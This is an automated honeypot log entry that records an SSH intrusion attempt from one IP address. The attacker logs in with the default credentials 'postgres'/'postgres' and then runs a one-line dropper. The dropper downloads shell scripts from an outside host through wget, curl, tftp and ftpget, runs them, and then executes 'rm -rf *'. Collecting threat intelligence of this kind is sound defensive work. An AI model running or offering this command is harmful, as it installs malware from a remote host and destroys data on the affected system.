honeypots.tk

Record Observations : 198.98.61.24 ssh Web script execution 198.98.61.24 81M6IV06NJGIL7L3

<< Back

198.98.61.24 client username 'postgres' and password 'postgres' entered
198.98.61.24 client command : 'cd /tmp; wget http://parabellum.ddnsgeek.com:8088/zatoempire.sh; curl -O http://parabellum.ddnsgeek.com:8088/zatoempire.sh; chmod 777 zatoempire.sh; sh zatoempire.sh; tftp parabellum.ddnsgeek.com -c get zatoempire.sh; chmod 777 zatoempire.sh; sh zatoempire.sh; tftp -r zatoempire2.sh -g parabellum.ddnsgeek.com; chmod 777 zatoempire2.sh; sh zatoempire2.sh; ftpget -v -u anonymous -p anonymous -P 21 parabellum.ddnsgeek.com zatoempire1.sh zatoempire1.sh; sh zatoempire1.sh; rm -rf zatoempire.sh zatoempire.sh zatoempire2.sh zatoempire1.sh; rm -rf *'
Author: Honeypots.tk Robot